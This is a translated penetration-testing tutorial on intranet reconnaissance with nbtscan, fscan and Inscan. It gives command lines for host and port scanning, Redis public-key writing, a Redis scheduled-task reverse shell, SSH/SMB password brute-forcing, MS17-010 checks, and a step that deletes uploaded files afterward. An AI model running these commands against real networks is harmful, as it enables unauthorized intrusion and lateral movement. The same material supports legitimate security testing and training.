Intranet detection (host survival, port, web assets)

Intranet detection (host survival, port, web assets)

When we can access any resources on the target intranet, we can collect deeper information on the target intranet, such as: host collection, IP segment collection, port open services, number of Web assets, vulnerability type 0x01.
nbtscan

1. Introduction:
   nbtscan is a small tool for scanning network information, released on November 23, 2005. NBTSCAN is petite, simple and fast. But it can only be used on LAN and can display IP, host name, user name and MAC address.
2. Command syntax: (simple usage)

nbtscan-1.0.35.exe 192.168.0.1/24

0x02. Fscan

1. Introduction:
   Fscan is a comprehensive intranet scanning tool that facilitates one-click automated, all-round missed scanning.
   Supports host survival detection, port scanning, common service blasting, ms17010, redis batch public key writing, scheduled task rebound shell, reading network card information, web fingerprint identification, web vulnerability scanning, netbios detection, domain control identification and other functions.
2. fscan download address: https://github.com/shadow1ng/fscan
   command syntax: (simple usage)

fscan.exe -h 192.168.1.1/24 (默认使⽤全部模块)
fscan.exe -h 192.168.1.1/16 (B段扫描)

Other uses

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存⽂件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执⾏)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端⼝)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定⽂件的⽤户名、密码
来进⾏爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,⽅便快速查看⽹段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块) 123456789

3. Practical test:
   For example, scan the C segment assets of 192.168.0.x, scan the results and save them to 0.txt:

fscan.exe -h 192.168.0.0/24 -o 0.txt

You can see that the scan results can identify the target host name, surviving IP, target open port, and open web services, MS17-010 (Eternal Blue), etc.

0x03. Inscan

1. introduce:

The automated intranet tool after boundary management is completely separated from the server. The server is only used to generate POC, network segment information and other configurations for multiple platforms, a single binary file, and no dependencies; it
supports automatic visualization of multi-level tunnels, and can traverse multi-layer networks through background button switches; Scanner that supports IPv6; Quickly and intuitively view machines with multiple network cards to facilitate quick location of machines that can penetrate multi-layer networks; Generate
social dictionary through known passwords to quickly access the intranet; Intranet B/S architecture system automatically Automated blasting, automatic identification of verification codes; rapid asset identification, site screenshots;
automated website directory scanning through scanned assets;

2. Official website address: https://www.inbug.org/
   First register a user, and then generate an Inscan Agent:
   

3. After downloading, just run it on the target terminal.
   

4. After the scan is completed, a poc.db file will be generated in the current path:
   

5. We can drag poc.db back to the local computer and import it into the database for viewing, or when running again, access the target ip:54088 to see the scan results:
   

6. Use Navicat to import the db file to view
   
   

7. Delete uploaded files

del 0.txt